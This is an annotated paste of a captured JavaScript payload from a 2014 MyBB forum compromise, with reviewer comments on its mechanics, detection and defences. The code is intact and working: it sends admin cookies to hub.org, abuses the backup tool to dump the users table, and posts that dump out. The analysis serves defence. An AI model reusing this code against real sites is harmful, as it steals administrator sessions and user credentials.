
Untitled

a guest
Nov 15th, 2014
  1. //# comments on [http://hub.org/analytics.php] as of [15-Nov-2014 16:50 UTC] by [devilshakerz.com]
  2.  
  3. document.getElementsByClassName('error')[0].style.display = 'none'; //# suppress MyBB-generated errors
  4.  //# NOTE(review): only the first element with class 'error' is hidden, so an error box rendered on the page is not shown to whoever is viewing it
  5.  
  6. function runStuff() {
  7.  //# NOTE(review): summary of this function: it posts the page URL and document.cookie to hub.org, fetches the ACP backup form, submits that form for the *users table, then posts the returned dump to hub.org
  8.     jQuery.noConflict(); //# make jQuery compatible with other JavaScript libraries
  9.  
  10.     //# send a POST request to adversary's server containing the address of the MyBB admin panel and user cookies originally designated only for the victim forum's server
  11.     jQuery.post('http://hub.org/analytics.php', {
  12.         path: document.location.href,
  13.         cookie: document.cookie
  14.     }, null, 'text');
  15.  //# NOTE(review): document.cookie exposes only cookies that lack the HttpOnly flag, so marking session cookies HttpOnly limits what this step can send
  16.  //# NOTE(review): the reply is never read (callback is null), so the same-origin policy does not stop the send; a CSP connect-src allow-list on the admin pages would
  17.     //# remotely get contents of the ACP database backups page
  18.     jQuery.get('index.php?module=tools-backupdb&action=backup', function(data) {
  19.  //# NOTE(review): the URL is relative, so the request goes to the site the script is running on and the browser attaches that site's session cookies itself
  20.         //# get name of the MyBB's native _users table (the selector takes the option whose value ends in "users" and does not contain "tapatalk")
  21.         var table = jQuery(data).find('#table_select option[value$="users"]:not([value*="tapatalk"])').val();
  22.  
  23.         //# get the post key (not defined in the ACP); NOTE(review): presumably the form's anti-CSRF token, read from the fetched page - a token of this kind does not protect against script already running in the same origin
  24.         var post_key = jQuery(data).find('input[name="my_post_key"]').val();
  25.  
  26.         //# make a spoofed request to create a backup of the _users table and to return the contents (plaintext file download)
  27.         jQuery.post('index.php?module=tools-backupdb&action=backup', {
  28.             my_post_key: post_key,
  29.             tables: [ table ],
  30.             filetype: 'plain',
  31.             method: 'download',
  32.             contents: 'data',
  33.             analyzeoptimize: 0
  34.         }, function(data) {
  35.  //# NOTE(review): detection - a GET followed by a POST to module=tools-backupdb&action=backup from one admin session, visible in the web server access log (and in the application's admin audit log, if one is kept)
  36.             //# send second POST request to adversary's server containing the address, cookies (again) and the backup file contents
  37.             jQuery.post('http://hub.org/analytics.php', {
  38.                 path: document.location.href,
  39.                 cookie: document.cookie,
  40.                 db: data
  41.             }, null, 'text');
  42.  //# NOTE(review): once this request has left the browser the table contents should be treated as disclosed; presumably that includes credential data for every account, so session invalidation and password resets belong in the response - confirm against the table schema
  43.         }, 'text');
  44.  
  45.     });
  46.  //# NOTE(review): egress/proxy logs showing POSTs from an administrator's browser to hub.org/analytics.php are the network-side indicator for both sends above
  47.  
  48. }
  49.  
  50. //# load jQuery, then run the payload code; NOTE(review): how this script reaches the page is not shown in this paste - output encoding at that injection point and a script-src policy on the admin pages are the controls that stop it before this line
  51. if (typeof jQuery === 'undefined') {
  52.     var jq = document.createElement('script');
  53.     jq.src = 'http://code.jquery.com/jquery.js'; //# NOTE(review): fetched over plain http from a third-party host; an admin-panel page requesting this URL when it normally does not is worth alerting on
  54.     jq.onload = runStuff; //# runStuff is deferred until the library has loaded
  55.     document.body.appendChild(jq);
  56. } else {
  57.     runStuff(); //# a jQuery global already exists on the page, so the function runs immediately
  58. }